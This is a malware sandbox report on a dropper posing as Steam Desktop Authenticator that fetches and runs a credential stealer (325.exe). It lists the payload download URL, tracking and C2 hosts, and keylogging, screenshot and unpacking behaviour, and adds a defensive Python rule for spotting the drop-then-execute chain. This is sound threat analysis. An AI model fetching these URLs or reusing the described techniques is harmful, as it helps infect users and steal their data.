Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp String found in binary or memory: http://yspasenana.xyz:80/
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb/geoip
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://aui-cdn.atlassian.com
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/
Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp String found in binary or memory: https://iplogger.org/1Spbs7
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1Spbs7e
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/y
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp String found in binary or memory: https://is.gd/nKi5S3
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3$
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3H
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: kS2dqbsDwD.exe String found in binary or memory: https://sectigo.com/CPS0C
Source: kS2dqbsDwD.exe String found in binary or memory: https://sectigo.com/CPS0D
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard, 0_2_00000001400053A0
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData, 0_2_0000000140005280
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject, 0_2_0000000140042E80
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140011052 GetKeyboardState, 0_2_0000000140011052
Creates a DirectInput object (often for capturing keystrokes)
Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW, 0_2_00000001400018BA

System Summary:

.NET source code contains very large strings
Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Window found: window name: AutoHotkey
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW, 0_2_0000000140043AD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW, 0_2_000000014004438A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043BF6 NtdllDefWindowProc_W, 0_2_0000000140043BF6
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043C50 NtdllDefWindowProc_W, 0_2_0000000140043C50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W, 0_2_0000000140043C8B
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043CAC NtdllDefWindowProc_W, 0_2_0000000140043CAC
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043CD9 NtdllDefWindowProc_W, 0_2_0000000140043CD9
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00000001400492B0
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00000001400624E0
Detected potential crypto function
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A6D70 appears 354 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140086C40 appears 51 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A4F28 appears 34 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A9358 appears 45 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035BF0 appears 107 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035870 appears 77 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400C2598 appears 38 times
PE / OLE file has an invalid certificate
Source: kS2dqbsDwD.exe Static PE information: invalid certificate
PE file contains strange resources
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 325.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name is different from the original file name gathered from version info
Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
Source: 325.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kS2dqbsDwD.exe Static PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/29@9/5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 0_2_0000000140036D50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00000001400624E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C22C0 GetDiskFreeSpaceW, 0_2_00000001400C22C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW, 0_2_0000000140088BA0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\field Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: kS2dqbsDwD.exe Virustotal: Detection: 20%
Source: kS2dqbsDwD.exe ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path}
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: kS2dqbsDwD.exe Static PE information: Image base 0x140000000 > 0x60000000
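
The "Process created" and "File created" entries above describe a three-step chain: kS2dqbsDwD.exe on the Desktop writes 325.exe into AppData\Roaming and launches it with the argument 325, and 325.exe then starts a second copy of its own image with the literal command line {path}. The detection below is an added example and not sandbox output. It runs three independent rules over a constructed, Sysmon-shaped event list: the field names follow Sysmon EID 1 (ProcessCreate) and EID 11 (FileCreate), the pids and the benign explorer/notepad/chrome/Teams events are made up, and pids are assumed unique inside the window, so a production version should key on ProcessGuid instead. The user-writable path list is an assumption to be extended per estate.

```python
"""Process-chain detection over Sysmon-shaped events (EID 1 ProcessCreate,
EID 11 FileCreate), in time order. Three independent rules, so one process can
trip several; keying on ProcessId assumes no pid reuse inside the window."""
import re

# Paths a dropper can write to without elevation (assumed list, extend per estate).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(appdata\\(roaming|local)|desktop|downloads)\\", re.I)


def user_writable(path):
    return bool(USER_WRITABLE.match(path))


def ancestors(pid, by_pid):
    """Parent pids of pid, nearest first, following ProcessCreate events seen so far."""
    chain = []
    while pid in by_pid and len(chain) < 32:       # bound guards against bad data
        pid = by_pid[pid]["ParentProcessId"]
        chain.append(pid)
    return chain


def analyze(events):
    """Return (rule, pid, detail) alerts for the event stream."""
    by_pid, dropped, alerts = {}, {}, []
    for ev in events:
        if ev["EventID"] == 11:                      # remember who wrote which path
            dropped[ev["TargetFilename"].lower()] = ev["ProcessId"]
            continue
        if ev["EventID"] != 1:
            continue
        pid, image, pimage = ev["ProcessId"], ev["Image"], ev["ParentImage"]
        by_pid[pid] = ev
        writer = dropped.get(image.lower())
        if writer is not None and writer in ancestors(pid, by_pid):
            alerts.append(("dropped_and_executed", pid,
                           f"{image} was written by pid {writer}, an ancestor of the new process"))
        if user_writable(image) and user_writable(pimage):
            alerts.append(("launch_from_user_writable", pid,
                           f"{pimage} started {image}; both images sit in user-writable paths"))
        if user_writable(image) and image.lower() == pimage.lower():
            alerts.append(("self_spawn_from_user_dir", pid,
                           f"{image} re-launched its own image with command line {ev['CommandLine']!r}"))
    return alerts


def rules_for(alerts, pid):
    return {rule for rule, p, _ in alerts if p == pid}


# Constructed events modelled on the report's process tree plus benign noise; pids are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 500, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessId": 700, "ParentProcessId": 500, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "ProcessId": 800, "ParentProcessId": 500, "CommandLine": "chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 801, "ParentProcessId": 800, "CommandLine": "chrome.exe --type=renderer",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"EventID": 1, "ProcessId": 900, "ParentProcessId": 500, "CommandLine": "Teams.exe",
     "Image": r"C:\Users\user\AppData\Local\Microsoft\Teams\current\Teams.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1000, "ParentProcessId": 500, "Image": r"C:\Users\user\Desktop\kS2dqbsDwD.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"'C:\Users\user\Desktop\kS2dqbsDwD.exe'"},
    {"EventID": 11, "ProcessId": 1000, "TargetFilename": r"C:\Users\user\AppData\Roaming\325.exe"},
    {"EventID": 1, "ProcessId": 2000, "ParentProcessId": 1000, "Image": r"C:\Users\user\AppData\Roaming\325.exe",
     "ParentImage": r"C:\Users\user\Desktop\kS2dqbsDwD.exe", "CommandLine": r"C:\Users\user\AppData\Roaming\325.exe 325"},
    {"EventID": 1, "ProcessId": 3000, "ParentProcessId": 2000, "Image": r"C:\Users\user\AppData\Roaming\325.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\325.exe", "CommandLine": "{path}"},
]

if __name__ == "__main__":
    for rule, pid, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] pid {pid}: {detail}")
```

The chrome.exe renderer and the Teams.exe launch from AppData\Local are in the sample on purpose: a self-spawn from Program Files and an AppData image started by explorer.exe raise nothing, while 325.exe trips the drop-then-execute rule through its ancestor chain and the self-spawn rule on the {path} child, which is the hand-off into the copy that the RedLine Yara hits later in this report land in.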

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Unpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
.NET source code contains potential unpacker
Source: 325.exe.0.dr, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary, 0_2_0000000140060290
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains an invalid checksum
Source: kS2dqbsDwD.exe Static PE information: real checksum: 0x9a0ca should be: 0xa1dfe
Source: 325.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xf8b72
PE file contains sections with non-standard names
Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS1
Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095F2A3 push esi; retf 0000h 0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099BAD8 push esi; retn 0000h 0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099CACC push esp; ret 0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00993723 pushfd ; ret 0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00996762 push es; retn 0002h 0_3_0099677A
Source: initial sample Static PE information: section name: .MPRESS1 entropy: 7.99951858505
Source: initial sample Static PE information: section name: .text entropy: 7.5685116349
Source: 325.exe.0.dr, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 325.exe.0.dr, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
